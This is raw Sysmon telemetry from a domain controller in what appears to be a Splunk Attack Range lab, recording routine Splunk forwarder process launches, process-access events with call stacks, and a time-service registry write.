16:05:07.934{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030177Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:07.934{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030176Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:07.934{7901BC46-4984-6008-0500-00000000A301}6401168C:\Windows\system32\csrss.exe{7901BC46-54B3-6008-CE06-00000000A301}5420C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030175Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:07.934{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-54B3-6008-CE06-00000000A301}5420C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030174Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:07.934{7901BC46-54B3-6008-CE06-00000000A301}5420C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000030173Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:07.403{7901BC46-54B3-6008-CD06-00000000A301}43767180C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030172Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:07.262{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-54B3-6008-CD06-00000000A301}4376C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030171Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:07.262{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030170Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:07.262{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030169Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:07.262{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030168Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:07.262{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030167Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:07.262{7901BC46-4984-6008-0500-00000000A301}6401076C:\Windows\system32\csrss.exe{7901BC46-54B3-6008-CD06-00000000A301}4376C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030166Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:07.262{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-54B3-6008-CD06-00000000A301}4376C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030165Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:07.263{7901BC46-54B3-6008-CD06-00000000A301}4376C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000030190Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:08.606{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-54B4-6008-CF06-00000000A301}4572C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030189Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:08.606{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030188Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:08.606{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030187Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:08.606{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030186Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:08.606{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030185Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:08.606{7901BC46-4984-6008-0500-00000000A301}6401076C:\Windows\system32\csrss.exe{7901BC46-54B4-6008-CF06-00000000A301}4572C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000030184Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:08.606{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-54B4-6008-CF06-00000000A301}4572C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000030183Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:08.606{7901BC46-54B4-6008-CF06-00000000A301}4572C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x800000000000000030182Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-SetValue2021-01-20 16:05:08.559{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ef46-0x06409ea8) 10341000x800000000000000030199Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:09.685{7901BC46-54B5-6008-D006-00000000A301}66886500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030198Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:09.544{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-54B5-6008-D006-00000000A301}6688C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030197Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:09.544{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030196Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:09.544{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030195Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:09.544{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030194Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:05:09.544{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030193Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 